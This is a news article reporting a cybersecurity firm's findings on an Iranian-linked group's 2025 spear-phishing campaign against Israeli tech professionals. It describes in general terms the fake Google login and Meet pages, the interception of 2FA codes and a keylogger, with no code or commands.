1,024 × 576

According to a recent report from a cybersecurity firm, some Israeli tech and cybersecurity professionals were contacted by attackers pretending to be assistants to technology executives or academic researchers. These approaches came via both email and WhatsApp messages. Victims who responded were led to counterfeit Google login pages or fake Google Meet invites.

This campaign has been linked to a threat group known as Educated Manticore, which shares characteristics with several other known Iranian threat actors such as APT35 (and its subgroup APT42), Charming Kitten, ITG18, Mint Sandstorm, and TA453, among others.

This advanced persistent threat group is known for carrying out sophisticated social engineering campaigns, often using fake identities on platforms like LinkedIn and Facebook to convince targets to download malicious software.

The cybersecurity firm noticed a surge in these phishing attempts beginning in mid-June 2025, coinciding with the escalation of conflict between Iran and Israel. The attackers sent personalized messages through email and WhatsApp, often framed as meeting requests, which appeared to be created using AI-based tools due to their polished structure and lack of errors.

In one notable WhatsApp message, the attackers leveraged the ongoing conflict to persuade the recipient to join a meeting. The pretense was a request for immediate help in developing an AI-powered system to detect cyber threats that had been increasing since June 12.

Initially, these messages—like in earlier Charming Kitten operations—contained no direct malicious content and were designed to build trust. After engaging the target in conversation, the attackers moved to the next stage by sending links to fraudulent login pages made to collect Google credentials.

Before doing so, they asked the target for their email address, which was then auto-filled into the fake login page. This detail was meant to enhance the illusion of legitimacy by replicating a real Google sign-in experience.

The phishing toolkit used in these attacks mimics authentic login interfaces, using modern development techniques such as React-based Single Page Applications (SPAs), dynamic page routing, and live WebSocket communication to transmit stolen data. Its design also helps conceal its underlying code, making detection more difficult.

These fake pages are capable not only of stealing usernames and passwords, but also intercepting two-factor authentication (2FA) codes, enabling attackers to bypass additional security layers. The toolkit includes a silent keylogger to capture everything typed by the victim, even if they abandon the login attempt partway through.

Some of these deception techniques have also made use of pages hosted on legitimate-looking domains to simulate Google Meet interfaces. Clicking anywhere on the image redirects the user to a phishing site that begins harvesting credentials.

The security firm emphasized that Educated Manticore remains a serious and persistent danger, especially amid the intensified conflict with Israel. The group is noted for its aggressive phishing methods, quick setup and teardown of malicious infrastructure, and its ability to adapt swiftly to countermeasures.